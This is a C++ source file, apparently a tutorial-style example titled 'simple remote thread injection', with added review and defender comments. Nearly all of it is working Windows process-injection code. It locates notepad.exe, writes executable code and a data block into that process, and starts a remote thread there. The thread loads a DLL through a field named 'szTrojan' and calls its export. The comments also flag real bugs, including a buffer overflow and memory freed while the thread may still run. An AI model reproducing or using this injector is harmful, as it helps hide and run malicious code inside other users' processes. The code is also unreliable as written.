注入远程线程简单例子[修改]
#include <windows.h>
#include <tlhelp32.h>
#include <cstdio>
using namespace std;
#pragma warning(disable:4311)
#pragma warning(disable:4312)
/**
 * Look up a process id by executable file name.
 *
 * Walks a Toolhelp process snapshot and returns th32ProcessID of the first
 * entry whose szExeFile equals lpszProcess (case-insensitive, lstrcmpi).
 *
 * @param lpszProcess  executable name to look for, e.g. "notepad.exe"
 * @return the matching process id, or 0 when no entry matches
 *
 * NOTE(review): the snapshot handle is never compared against
 * INVALID_HANDLE_VALUE and the Process32First result is ignored, so when the
 * snapshot fails the loop compares against an uninitialised PROCESSENTRY32.
 */
DWORD FindTarget(LPCTSTR lpszProcess)
{
    DWORD dwRet = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32); // Process32First requires dwSize to be set
    Process32First(hSnapshot,&pe32);
    do{
        if(lstrcmpi(pe32.szExeFile,lpszProcess) == 0){
            dwRet = pe32.th32ProcessID;
            break; // first match wins; later processes with the same name are ignored
        }
    }while(Process32Next(hSnapshot,&pe32));
    CloseHandle(hSnapshot);
    return dwRet;
}
// ========== 定义一个代码结构,本例为一个对话框============
// Data block that main() writes into the target process and passes to the
// remote thread as its only argument. Every API pointer the thread needs is
// carried here as a DWORD, so the layout only holds a pointer on 32-bit
// builds (the pointer-truncation warnings 4311/4312 are disabled at the top
// of the file).
struct MyData
{
    char sz[64];              // message-box text
    DWORD dwMessageBox;       // address of MessageBoxA
    char szTrojan[256];       // full path of the DLL to load, copied from GetModuleFileName in main()
    char szKernel[64];        // "Kernel32.dll"
    DWORD dwLoadLibrary;      // address of LoadLibraryA
    DWORD dwGetProcAddress;   // address of GetProcAddress
    DWORD dwTrojanEntry;      // never assigned or read anywhere in this file
    DWORD dwGetModuleHandle;  // address of GetModuleHandleA; assigned in main(), not used by RMTFunc
    char szCmd[64];           // name of the export to resolve in the loaded DLL ("InitWindow")
};
// ========== 远程线程的函数 ==============================
// ========== Remote thread body ==============================
// Thread procedure that runs inside the target process. main() copies the raw
// bytes of this function into the target (WriteProcessMemory of &RMTFunc), so
// every API is reached through the addresses carried in pData instead of this
// module's import table; presumably the body must not reference anything in
// this module by absolute address, so no helpers or string literals are used.
// Always returns 0; main() closes the thread handle without collecting it.
DWORD __stdcall RMTFunc(MyData *pData)
{
    typedef int(__stdcall*MMessageBox)(HWND,LPCTSTR,LPCTSTR,UINT);
    MMessageBox MsgBox = (MMessageBox)pData->dwMessageBox;
    MsgBox(NULL, pData->sz, NULL, MB_OK);
    typedef HMODULE (__stdcall* PLoadLibrary)(LPCTSTR);
    PLoadLibrary plib = (PLoadLibrary)pData->dwLoadLibrary;
    plib(pData->szKernel); // load Kernel32.dll; the returned module handle is discarded
    typedef FARPROC (__stdcall* PGetProcAddress)(HMODULE,LPCSTR);
    PGetProcAddress pGPAddress = (PGetProcAddress)pData->dwGetProcAddress;
    typedef HMODULE (__stdcall* PGetModuleHandle)(LPCTSTR);
    PGetModuleHandle pGMHandle = (PGetModuleHandle)pData->dwGetModuleHandle; // assigned but never used
    //PGetModuleHandle(plib(pData->szTrojan)); // load the DLL (disabled)
    HINSTANCE hTrojan = plib(pData->szTrojan); // load the DLL by the full path in szTrojan
    typedef int (__stdcall* iw)();
    // NOTE(review): neither hTrojan nor iww is checked for NULL before the call below.
    iw iww = (iw)pGPAddress(hTrojan,pData->szCmd);
    iww(); // call InitWindow exported by svDLLLG.dll
    return 0;
}
// Entry point: finds notepad.exe, copies RMTFunc and a MyData block into it
// and starts a remote thread at the copied code.
//
// Defender note: the observable sequence is OpenProcess(PROCESS_ALL_ACCESS)
// on another process, VirtualAllocEx of a PAGE_EXECUTE_READWRITE region,
// cross-process WriteProcessMemory, and CreateRemoteThread whose start
// address lies in that private region rather than in a mapped image.
//
// Returns 0 on every path, including every failure path; argc/argv are
// unused. Early returns leave hProcess open (reclaimed at process exit).
// Only meaningful as a 32-bit build, since MyData stores pointers as DWORD.
int main(int argc, char* argv[])
{
    // ===== Obtain a handle to the process that will host the remote thread =====
    DWORD dwProcessId = FindTarget("notepad.exe"); // 0 when notepad.exe is not running; not checked
    HANDLE hProcess = OpenProcess(
        PROCESS_ALL_ACCESS,
        FALSE,
        dwProcessId); // NOTE(review): hProcess is not NULL-checked before it is used below
    // ========= Fill in the data block =====================================
    TCHAR strTName[MAX_PATH];
    MyData data;
    ZeroMemory(&data, sizeof (MyData)); // the strcat calls below therefore copy into empty strings
    strcat(data.sz, "对话框的内容.");
    strcat(data.szKernel,"Kernel32.dll");
    // hTrojan is not NULL-checked; GetModuleFileName(NULL, ...) returns this
    // executable's own path, so a missing DLL silently changes szTrojan.
    HINSTANCE hTrojan = LoadLibrary("svDLLLG.dll");
    GetModuleFileName(hTrojan,strTName,MAX_PATH);
    // NOTE(review): strTName holds up to MAX_PATH characters but szTrojan is
    // 256 bytes, so a long module path overflows the struct here.
    strcat(data.szTrojan,strTName);
    strcat(data.szCmd,"InitWindow");
    // Resolve the API addresses the remote thread will call. This assumes
    // user32 and kernel32 are mapped at the same base in the target — TODO confirm.
    HINSTANCE hUser = LoadLibrary("user32.dll");
    HINSTANCE hKernel = LoadLibrary("Kernel32.dll");
    if(!hKernel){
        printf("Can not load library\n");
        return 0;
    }
    if (! hUser)
    {
        printf("Can not load library.\n");
        return 0;
    }
    data.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
    data.dwGetProcAddress = (DWORD)GetProcAddress(hKernel,"GetProcAddress");
    data.dwLoadLibrary = (DWORD)GetProcAddress(hKernel,"LoadLibraryA");
    data.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel,"GetModuleHandleA");
    FreeLibrary(hUser);
    FreeLibrary(hKernel);
    FreeLibrary(hTrojan);
    if (! data.dwMessageBox) // only this lookup is checked; the three kernel32 lookups are not
        return 0;
    // ======= Allocate space in the target =================================
    // 4 KiB of RWX memory. The copy below takes 4 KiB starting at &RMTFunc,
    // i.e. whatever follows RMTFunc in this image as well — assumes the
    // compiled body is shorter than that and the whole range is readable.
    void *pRemoteThread
        = VirtualAllocEx(hProcess, 0,
                         1024*4, MEM_COMMIT|MEM_RESERVE,
                         PAGE_EXECUTE_READWRITE);
    if (! pRemoteThread)
        return 0;
    if (! WriteProcessMemory(hProcess, pRemoteThread, &RMTFunc, 1024*4, 0))
        return 0;
    MyData *pData
        = (MyData*)VirtualAllocEx(hProcess, 0,
                                  sizeof (MyData), MEM_COMMIT,
                                  PAGE_READWRITE);
    if (!pData)
        return 0;
    if (! WriteProcessMemory(hProcess, pData, &data, sizeof (MyData), 0))
        return 0;
    // =========== Create the remote thread =================================
    HANDLE hThread
        = CreateRemoteThread(hProcess, 0,
                             0, (LPTHREAD_START_ROUTINE)pRemoteThread,
                             pData, 0, 0);
    if (! hThread)
    {
        printf("远程线程创建失败"); // "failed to create the remote thread"
        return 0;
    }
    CloseHandle(hThread);
    // NOTE(review): both regions are released immediately after the thread is
    // started, without waiting for it, so the target may still be executing
    // from pRemoteThread. The size passed here (3 KiB) does not match the
    // 4 KiB allocated above, and neither VirtualFreeEx result is checked.
    VirtualFreeEx(hProcess, pRemoteThread, 1024*3, MEM_RELEASE);
    VirtualFreeEx(hProcess, pData, sizeof (MyData), MEM_RELEASE);
    CloseHandle(hProcess);
    printf("Hello World!\n");
    return 0;
}